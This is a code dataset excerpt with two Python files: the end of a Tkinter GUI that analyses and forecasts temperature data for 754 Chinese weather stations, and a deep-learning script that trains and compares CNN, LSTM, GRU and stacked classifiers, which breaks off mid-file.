Tk()\nroot.title(\"中国754个站台1960-2018年气温数据处理\") \nlb_sm=Label(root,text=\"请选择1-3个站台\")\nlb_sm.grid(row=0,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_z1=Label(root,text=\"站台1\")\nlb_z1.grid(row=1,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_z2=Label(root,text=\"站台2\")\nlb_z2.grid(row=2,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_z3=Label(root,text=\"站台3\")\nlb_z3.grid(row=3,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlocation = r'754stations_infos.xlsx'\ndf = pd.read_excel(location, 0)\nsubset = df['站名']\ntuples = subset.values.tolist()\n\ncomvalue1=StringVar()\ncomboxlist1=ttk.Combobox(root,textvariable=comvalue1)\ncomboxlist1[\"values\"]=tuples\ncomboxlist1.grid(row=1,column=1,ipadx=10,ipady=10,padx=10,pady=10)\ncomvalue2=StringVar()\ncomboxlist2=ttk.Combobox(root,textvariable=comvalue2)\ncomboxlist2[\"values\"]=tuples\ncomboxlist2.grid(row=2,column=1,ipadx=10,ipady=10,padx=10,pady=10)\ncomvalue3=StringVar()\ncomboxlist3=ttk.Combobox(root,textvariable=comvalue3)\ncomboxlist3[\"values\"]=tuples\ncomboxlist3.grid(row=3,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nbtn_zt=Button(root,text=\"查看站台数据\",width=20,command=get_zt)\nbtn_zt.grid(row=0,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nr=StringVar()\nradio1 = Radiobutton(root, text=\"月平均日最高温度\", variable=r,value=\"月平均日最高温度\" )\nradio1.grid(row=5,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nradio2 = Radiobutton(root, text=\"月平均日最低温度\", variable=r,value=\"月平均日最低温度\")\nradio2.grid(row=5,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nradio3 = Radiobutton(root, text=\"月平均日平均温度\", variable=r,value=\"月平均日平均温度\")\nradio3.grid(row=6,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nradio4 = Radiobutton(root, text=\"年平均日最高温度\",variable=r,value=\"年平均日最高温度\")\nradio4.grid(row=6,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nradio5 = Radiobutton(root, text=\"年平均日最低温度\",variable=r,value=\"年平均日最低温度\")\nradio5.grid(row=7,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nradio6 = Radiobutton(root, text=\"年平均日平均温度\", variable=r,value=\"年平均日平均温度\")\nradio6.grid(row=7,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nr.set(\"月平均日最高温度\")\n\nbtn_pic=Button(root,text=\"获取数据\",width=20,command=get_info)\nbtn_pic.grid(row=8,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nbtn_pic=Button(root,text=\"作图\",width=20,command=cal_info)\nbtn_pic.grid(row=8,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_yc=Label(root,text=\"请选择1个站台的数据进行平均气温的预测\")\nlb_yc.grid(row=10,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nlb_yc=Label(root,text=\"请输入预测年份\")\nlb_yc.grid(row=11,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nE1 = Entry(root)\nE1.grid(row=11,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nbtn_cle=Button(root,text=\"清除界面\",width=20,command=(lambda x=ALL: cv.delete(x)))\nbtn_cle.grid(row=12,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nbtn_yc=Button(root,text=\"开始预测\",width=20,command=yc)\nbtn_yc.grid(row=12,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nmenu_bar = Menu(root)\nroot.config(menu=menu_bar)\nhelp_menu = Menu(menu_bar, tearoff=0)\nhelp_menu.add_command(label=\"About\",command=about_call)\nmenu_bar.add_cascade(label=\"Help\", menu=help_menu)\n\nroot.mainloop()\n", "repo_name": "kookil/GUI-design-homework", "sub_path": "中国754个站台1960-2018年气温数据处理及根据平均温度对未来天气进行预测/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 9805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_table", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 157, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 189, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 190, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 219, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 220, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "pandas.read_excel", "line_number": 253, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 258, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 258, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 262, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 262, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 266, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 266, "usage_type": "name"}]} +{"seq_id": "72566506405", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 15 21:46:12 2023\n\n@author: rehan\n\"\"\"\n\nfrom imblearn.over_sampling import RandomOverSampler\nimport numpy as np\nnp.random.seed(1234)\nimport random\nrandom.seed(1234)\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport tqdm\nfrom sklearn.model_selection import train_test_split\n\nimport os\nimport glob\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score, ConfusionMatrixDisplay\nfrom sklearn.metrics import cohen_kappa_score, roc_auc_score,f1_score,precision_score,recall_score, roc_curve\nfrom scipy.stats import ttest_rel\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\ntf.random.set_seed(1234)\nfrom tensorflow.keras.layers import BatchNormalization, ReLU, GRU, Input, SpatialDropout1D, Bidirectional, MaxPooling2D, MaxPooling1D, Conv1D, Dense, Flatten, Dropout, LSTM, concatenate, Conv2D\nfrom tensorflow.keras.optimizers import Adam,SGD\n# from tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Model, load_model, Sequential\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.losses import CategoricalCrossentropy\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint\n\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\n# from sklearn.naive_bayes import GaussianNB\nfrom sklearn import tree\nimport pickle\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ninput_fodler = 'whole_data' # Data Folder Path\n\n\n\nimport keras.backend as K\nfrom keras.layers import Layer\n\nclass RBFLayer(Layer):\n def __init__(self, units, gamma, **kwargs):\n super(RBFLayer, self).__init__(**kwargs)\n self.units = units\n self.gamma = K.cast_to_floatx(gamma)\n\n def build(self, input_shape):\n self.mu = self.add_weight(name='mu',\n shape=(int(input_shape[1]), self.units),\n initializer='uniform',\n trainable=True)\n super(RBFLayer, self).build(input_shape)\n\n def call(self, inputs):\n diff = K.expand_dims(inputs) - self.mu\n l2 = K.sum(K.pow(diff, 2), axis=1)\n res = K.exp(-1 * self.gamma * l2)\n return res\n\n\n# class SelfAttention(tf.keras.layers.Layer):\n# def __init__(self, d_model):\n# super(SelfAttention, self).__init__()\n# self.d_model = d_model\n\n# def build(self, input_shape):\n# self.W_q = self.add_weight(name=\"W_q\", shape=(self.d_model, self.d_model), initializer=\"uniform\")\n# self.W_k = self.add_weight(name=\"W_k\", shape=(self.d_model, self.d_model), initializer=\"uniform\")\n# self.W_v = self.add_weight(name=\"W_v\", shape=(self.d_model, self.d_model), initializer=\"uniform\")\n\n# def call(self, inputs):\n# q = tf.matmul(inputs[0], self.W_q)\n# k = tf.matmul(inputs[1], self.W_k)\n# v = tf.matmul(inputs[2], self.W_v)\n\n# attention_scores = tf.matmul(q, k, transpose_b=True)\n# attention_scores = attention_scores / tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n\n# attention_weights = tf.nn.softmax(attention_scores, axis=-1)\n# output = tf.matmul(attention_weights, v)\n\n# return output \n\n\nclass Models_class__:\n def __init__(self):\n self.epochs = 100\n self.batch_size = 32\n self.verbose = 1\n self.neurons_models = 128\n self.lr = 0.01\n self.lat_layer_activation = 'softmax'\n self.early_Stop = 100\n self.group_rows = 5\n self.chennels = 8\n self.classes = 4\n self.remove_from_start = 0 # keep 0 if nothing to drop from start\n self.remove_from_end = 1 # keep 1 if nothing to drop from end\n\n self.histories = []\n self.accuracies = {}\n self.accuracies['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.cohen_kappa_score = {}\n self.cohen_kappa_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.roc_auc_score = {}\n self.roc_auc_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.f1_score = {}\n self.f1_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n self.precision_score = {}\n self.precision_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n self.recall_score = {}\n self.recall_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.classes_names = [str(i) for i in range(self.classes)]\n if len(self.classes_names)==2:\n self.Multi_class = False\n\n elif len(self.classes_names)>2:\n self.Multi_class = True\n\n def perform_t_test(self,df):\n\n m = len(df)-1\n proposed = df.iloc[-1,1:-1]\n p_value_thres = 0.05\n models_name = ['proposed','Stacked','CNN','LSTM','Bi-LSTM',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'bi_lstm_lr', 'bi_lstm_svm', 'bi_lstm_dt'\n\n ]\n all_p_values = []\n for i in range(m):\n p_value = ttest_rel(a=proposed, b=df.iloc[i,1:-1]).pvalue\n check_p_value = p_value/m\n # print(models_name[i], p_value,'p/m',check_p_value)\n if check_p_value>p_value_thres:\n print('need to discard',models_name[i])\n m = m-1\n all_p_values.append(p_value)\n\n all_p_values.append(check_p_value)\n\n df['ttest_p_value'] = all_p_values\n\n return df\n\n def evaluation(self,\n y_true,y_pred,name):\n\n auc = []\n auc.append(np.round(accuracy_score(y_true,y_pred),4))\n\n auc.append(np.round(cohen_kappa_score(y_true,y_pred),4))\n if self.Multi_class:\n auc.append(np.round(roc_auc_score(y_true,\n to_categorical(y_pred,num_classes=self.classes),\n multi_class = 'ovr'),4))\n auc.append(np.round(f1_score(y_true,y_pred,\n average = 'macro'),4))\n auc.append(np.round(precision_score(y_true,y_pred,\n average = 'macro'),4))\n auc.append(np.round(recall_score(y_true,y_pred,\n average = 'macro'),4))\n else:\n auc.append(np.round(roc_auc_score(y_true,y_pred),4))\n auc.append(np.round(f1_score(y_true,y_pred),4))\n auc.append(np.round(precision_score(y_true,y_pred),4))\n auc.append(np.round(recall_score(y_true,y_pred),4))\n\n print(name+' accuracy:',auc[0])\n\n cm = confusion_matrix(y_true,y_pred)\n\n disp = ConfusionMatrixDisplay(cm,\n display_labels=self.classes_names)\n disp.plot()\n plt.title('Confusion matrix',fontsize=20, fontweight='bold')\n\n plt.xlabel('Predicted Values',fontsize=18, fontweight='bold')\n plt.ylabel('True Values',fontsize=18, fontweight='bold')\n\n plt.tight_layout()\n plt.savefig(os.path.join(self.output_folder,name+'_confusion_matrics.png'))\n report = classification_report(y_true,y_pred, target_names=self.classes_names,output_dict=True) #classification report\n df = pd.DataFrame(report).transpose()\n\n df.insert(0, \"\", [str(i) for i in range(self.classes)] +['accuracy','macro avg','weighted avg'])\n df.to_csv(os.path.join(self.output_folder,name+'_classification_report.csv'),index = False)\n\n return auc\n def get_CNN(self, input_size):\n # Initialising the CNN\n model = Sequential()\n\n model.add(Conv1D(self.neurons_models, kernel_size=2,\n activation='relu', input_shape=input_size,\n kernel_regularizer = 'L1L2',\n bias_regularizer = 'L2',\n \n ))\n model.add(Conv1D(self.neurons_models, kernel_size=2, activation='relu',\n kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(SpatialDropout1D(0.2))\n model.add(MaxPooling1D(pool_size=3,data_format='channels_last'))\n # model.add(BatchNormalization())\n # model.add(Conv1D(self.neurons_models, kernel_size=2, activation='relu'))\n\n model.add(Flatten())\n \n # model.add(Dropout(0.1))\n model.add(Dense(32, activation='relu',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n \n model.add(BatchNormalization())\n model.add(Dense(self.classes, activation=self.lat_layer_activation))\n\n # Compliling the model\n model.compile(optimizer=Adam(learning_rate=self.lr),\n loss=CategoricalCrossentropy(),\n metrics=['accuracy'])\n # print(model.summary())\n return model\n\n def get_LSTM(self, input_size):\n # Initialising the LSTM\n model = Sequential()\n\n model.add(LSTM(self.neurons_models, input_shape=input_size, return_sequences=True,\n kernel_regularizer = 'L1L2',\n bias_regularizer = 'L2',))\n model.add(LSTM(self.neurons_models, return_sequences=True,\n kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(SpatialDropout1D(0.2))\n model.add(MaxPooling1D(pool_size=3))\n # model.add(BatchNormalization())\n\n model.add(Flatten())\n # model.add(Dropout(0.2))\n model.add(Dense(32, activation='relu',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(BatchNormalization())\n\n model.add(Dense(self.classes, activation=self.lat_layer_activation))\n\n # Compliling the model\n model.compile(optimizer=Adam(learning_rate=self.lr),\n loss=CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model\n\n def get_BI_LSTM(self, input_size):\n # Initialising the BI-LSTM\n model = Sequential()\n\n model.add(GRU(self.neurons_models, input_shape=input_size, return_sequences=True,\n kernel_regularizer = 'L1L2',\n bias_regularizer = 'L2',))\n model.add(GRU(self.neurons_models, return_sequences=True,\n kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(SpatialDropout1D(0.2))\n model.add(MaxPooling1D(pool_size=3))\n # model.add(BatchNormalization())\n\n\n model.add(Flatten())\n # model.add(Dropout(0.2))\n model.add(Dense(32, activation='relu',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(BatchNormalization())\n\n model.add(Dense(self.classes, activation=self.lat_layer_activation))\n\n # Compliling the model\n model.compile(optimizer=Adam(learning_rate=self.lr),\n loss=CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model\n\n def train(self, path='',):\n\n MC = ModelCheckpoint(\n filepath=path,\n monitor=\"val_accuracy\",\n verbose=0,\n mode=\"auto\",\n save_best_only=True,\n )\n\n er = EarlyStopping(\n monitor=\"val_accuracy\",\n min_delta=0,\n patience=self.early_Stop,\n verbose = self.verbose,\n mode=\"auto\",\n baseline=None,\n restore_best_weights=True)\n\n lr = ReduceLROnPlateau(\n monitor='val_accuracy',\n factor=0.1,\n patience=5,\n verbose = self.verbose,\n mode='auto',\n min_delta=0.01,\n cooldown=0,\n min_lr=0,)\n\n history = self.model.fit(self.X_train, self.Y_train,\n batch_size=self.batch_size,\n epochs=self.epochs,\n verbose=self.verbose,\n validation_data=(self.X_test, self.Y_test),\n callbacks=[MC, er, lr],\n )\n # self.histories.append(history)\n\n plt.figure(figsize=(15, 10))\n # plt.figure()\n plt.subplot(1, 2, 2)\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model Accuracy',fontsize=26, fontweight='bold')\n plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n plt.ylabel('Accuracy',fontsize=22, fontweight='bold')\n plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n plt.xticks(fontsize=20, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.ylim(0.0, 1.0)\n\n plt.subplot(1, 2, 1)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model Loss',fontsize=26, fontweight='bold')\n plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n plt.ylabel('Loss',fontsize=22, fontweight='bold')\n plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n plt.xticks(fontsize=20, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.ylim(0.0, 1.0)\n\n file_name = os.path.basename(path)[:-3]\n\n plt.tight_layout()\n plt.savefig(os.path.join(self.output_folder, file_name+'.png'))\n\n # plt.show()\n\n plt.close('all')\n # if 'proposed' in file_name:\n # self.model = load_model(path,custom_objects={'SelfAttention':SelfAttention,\n # 'RBFLayer':RBFLayer})\n # else:\n self.model = load_model(path)\n\n def create_dataset(self, csv_path):\n df = pd.read_csv(csv_path)\n \n # oxygeneted = [i for i in df.columns if '_O' in i] + [df.columns[-1]]\n # df = df[oxygeneted]\n\n # data = df.dropna()\n# Separate features and labels\n # X = data.iloc[:, :-1] # Features (exclude the last column)\n # y = data.iloc[:, -1] # Labels (last column)\n# print(y)\n# Apply RandomOverSampler to balance the classes\n # ros = RandomOverSampler(random_state=42)\n # X_resampled, y_resampled = ros.fit_resample(X, y)\n\n# Create a new balanced DataFrame\n # balanced_data = pd.concat([X_resampled, y_resampled], axis=1)\n\n# Save the balanced data to a new CSV file\n # balanced_data.to_csv('balanced_dataset.csv', index=False)\n # df = pd.read_csv('balanced_dataset.csv', header=None)\n df = df.dropna()\n\n df= df.iloc[self.remove_from_start+1:-self.remove_from_end,:]\n # # print(df)\n # df_numpy = df.to_numpy()\n # df_numpy_n = df_numpy[:, :-1]\n\n # scaler = MinMaxScaler()\n # scaler.fit(df_numpy_n)\n\n # self.df = pd.DataFrame(scaler.transform(\n # df.iloc[:, :-1]), index=df.index, columns=None)\n # self.df['labels'] = df.iloc[:, -1]\n self.df = df\n\n def create_output_folder(self, csv_path):\n\n self.folder_name = os.path.basename(csv_path)[:-4]\n self.output_folder = os.path.join('output', self.folder_name)\n\n if not os.path.exists(self.output_folder):\n os.makedirs(self.output_folder)\n\n def model_layers_seting(self, input,model):\n \n model.layers[0].trainable = False\n new_model = model.layers[0](input)\n for layer in model.layers[1:-3]:\n # Freeze the layers\n layer.trainable = False\n new_model = layer(new_model)\n return new_model\n\n def stacking_model(self, CNN_model, LSTM_model, BI_LSTM_model,\n input_shape=(2, 20)):\n\n input = Input(shape=input_shape)\n CNN_model = self.model_layers_seting( input,CNN_model)\n LSTM_model = self.model_layers_seting( input,LSTM_model)\n BI_LSTM_model = self.model_layers_seting( input,BI_LSTM_model)\n\n x = concatenate([CNN_model, LSTM_model, BI_LSTM_model], axis=1)\n x = Dense(32, activation='relu', name = 'stacking_1',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n x = Dense(32, activation='relu', name = 'stacking_2',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n out = Dense(self.classes, activation=self.lat_layer_activation, name='otput_layer')(x)\n\n model_new = Model(inputs=input, outputs=out)\n model_new.compile(optimizer=Adam(learning_rate=self.lr),\n loss = CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model_new\n \n \n def Resnet_stacking_model(self, CNN_model, LSTM_model, BI_LSTM_model,\n input_shape=(2, 20)):#Radial Basis Function Networks\n \n input = Input(shape=input_shape)\n CNN_model = self.model_layers_seting( input,CNN_model)\n LSTM_model = self.model_layers_seting( input,LSTM_model)\n BI_LSTM_model = self.model_layers_seting( input,BI_LSTM_model)\n \n # x = SelfAttention(128)([CNN_model, LSTM_model, BI_LSTM_model])\n x = Flatten()(input)\n # x = RBFLayer(128,0.3)(x)\n x = Dense(128, activation='gelu',)(x)\n \n CNN_model = tf.keras.layers.Add()([CNN_model,x])\n LSTM_model = tf.keras.layers.Add()([LSTM_model,x])\n BI_LSTM_model = tf.keras.layers.Add()([BI_LSTM_model,x])\n \n x = concatenate([CNN_model, LSTM_model, BI_LSTM_model], axis=1)\n # x = Flatten()(input)\n \n \n # x = RBFLayer(128, 0.1)(x) # to look global patterns\n # x = RBFLayer(64, 0.3)(x) # to look local pattern or close relations.\n # x = RBFLayer(64, 0.5)(x) # to look local pattern or close relations.\n # x = RBFLayer(32, 0.5)(x) # to look local pattern or close relations.\n x = Dense(64, activation='relu', name = 'stacking_1',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n x = Dense(64, activation='relu', name = 'stacking_2',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n \n out = Dense(self.classes, activation=self.lat_layer_activation, name='otput_layer')(x)\n\n model_new = Model(inputs=input, outputs=out)\n # print(model_new.summary())\n model_new.compile(optimizer=Adam(learning_rate=self.lr),\n loss = CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model_new\n \n\n def load_DL_models(self):\n LSTM_model = load_model(os.path.join(self.output_folder, 'LSTM.h5'))\n BI_LSTM_model = load_model(os.path.join(self.output_folder, 'GRU.h5'))\n CNN_model = load_model(os.path.join(self.output_folder, 'CNN.h5'))\n return CNN_model, LSTM_model, BI_LSTM_model\n\n def remove_last_layer(self,model):\n model_new = Sequential()\n for layer in model.layers[:-3]: # this is where I changed your code\n layer.trainable = False\n model_new.add(layer)\n return model_new\n\n def get_train_test_feautures(self,model):\n return model.predict(self.X_train,verbose = self.verbose), model.predict(self.X_test,verbose = self.verbose)\n\n\n def single_ml_train(self, model,train_cnn_feats, test_cnn_feats,\n name=''):\n\n model.fit(train_cnn_feats,np.argmax(self.Y_train,axis = 1))\n y_pred = model.predict(test_cnn_feats)\n self.predictions.append(model.predict_proba(test_cnn_feats))\n acc = self.evaluation(np.argmax(self.Y_test,axis = 1),y_pred,\n name = name)\n\n # save the model to disk\n model_path = os.path.join(self.output_folder, name+'.sav')\n pickle.dump(model, open(model_path, 'wb'))\n\n return acc\n\n def get_model_features_with_FFT(self,model):\n model_new = self.remove_last_layer(model)\n train_feats, test_feats = self.get_train_test_feautures(model_new)\n return np.fft.fft(train_feats).real, np.fft.fft(test_feats).real\n\n\n def ML_classifier_train(self,model,name):\n\n model_new = self.remove_last_layer(model)\n train_feats, test_feats = self.get_train_test_feautures(model_new)\n\n LR = LogisticRegression()\n lr_acc = self.single_ml_train(LR,train_feats, test_feats,\n name=name+'_Logistic_regression')\n\n\n svm = SVC(kernel='linear',probability=True)\n svm_acc = self.single_ml_train(svm,train_feats, test_feats,\n name=name+'_svm')\n\n # nb = GaussianNB()\n # nb_acc = self.single_ml_train(nb,train_feats, test_feats,\n # name=name+'_naive_bayes')\n\n dt = tree.DecisionTreeClassifier()\n dt_acc = self.single_ml_train(dt,train_feats, test_feats,\n name=name+'_decision_tree')\n\n return lr_acc, svm_acc, dt_acc\n\n def train_evaluate(self, name = 'model', epochs = 0):\n\n # print(self.model.summary())\n print('Training:',name)\n self.train(path=os.path.join(self.output_folder, name+'.h5'))\n y_pred = self.model.predict(self.X_test,verbose = self.verbose)\n self.predictions.append(y_pred)\n acc = self.evaluation(np.argmax(self.Y_test,axis = 1),np.argmax(y_pred,axis = 1),\n name = name)\n return acc\n\n def ROC_curve(self):\n y_test = np.argmax(self.Y_test,axis = 1)\n models_name = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n colors = ['black','brown','red','orange','yellow','limegreen','lime','cyan','teal',\n 'deepskyblue','olive','navy','violet','purple','slategray']\n\n plt.figure(figsize=(15, 10))\n\n for i,probs in enumerate(self.predictions[:5]):\n # print(i,len(probs),models_name[i])\n fpr1, tpr1, thresh1 = roc_curve(y_test, probs[:,1], pos_label=1)\n plt.plot(fpr1, tpr1, label=models_name[i],color= colors[i])\n\n plt.legend(fontsize=15)\n plt.title('ROC curve',fontsize=26, fontweight='bold')\n plt.xlabel('False Positive Rate',fontsize=22, fontweight='bold')\n plt.ylabel('True Positive 